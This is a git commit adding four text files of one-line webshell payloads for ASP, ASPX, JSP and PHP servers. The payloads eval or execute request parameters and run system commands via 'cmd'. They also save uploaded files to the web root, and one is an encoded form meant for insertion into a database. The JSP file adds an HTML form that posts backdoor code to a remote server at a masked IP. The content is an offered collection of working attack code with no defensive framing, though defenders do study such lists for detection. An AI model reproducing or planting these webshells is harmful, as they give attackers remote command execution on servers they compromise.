add the word webshell

This commit is contained in:
tennc 2014-05-22 08:41:53 +08:00
parent e60084c9e0
commit cf5003d2a2
4 changed files with 41 additions and 0 deletions

16
asp/ASP一句话02.txt Normal file
View file

@ -0,0 +1,16 @@
ASP
<%eval request("sb")%>
<%execute request("sb")%>
%><%Eval(Request(chr(35)))%><%
<%ExecuteGlobal request("sb")%>
在数据库里插入的一句话木马
┼攠數畣整爠煥敵瑳∨∣┩愾
┼癥污爠煥敵瑳∨≡┩> 密码为: a

7
aspx/ASPX一句话02.txt Normal file
View file

@ -0,0 +1,7 @@
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
< %@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>

9
jspx/jsp一句话.txt Normal file
View file

@ -0,0 +1,9 @@
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
提交客户端
程序后门代码
<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
< textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
< input type=submit value="提交">
< /form>

9
php/php一句话02.txt Normal file
View file

@ -0,0 +1,9 @@
<?php eval($_POST[sb])?>
<?php @eval($_POST[c])?>
<?php system($_REQUEST['cmd']);?>
<?php assert($_POST[c]);?>
<?fputs(fopen(c.php,w),<?eval($_POST[c]);?>)?>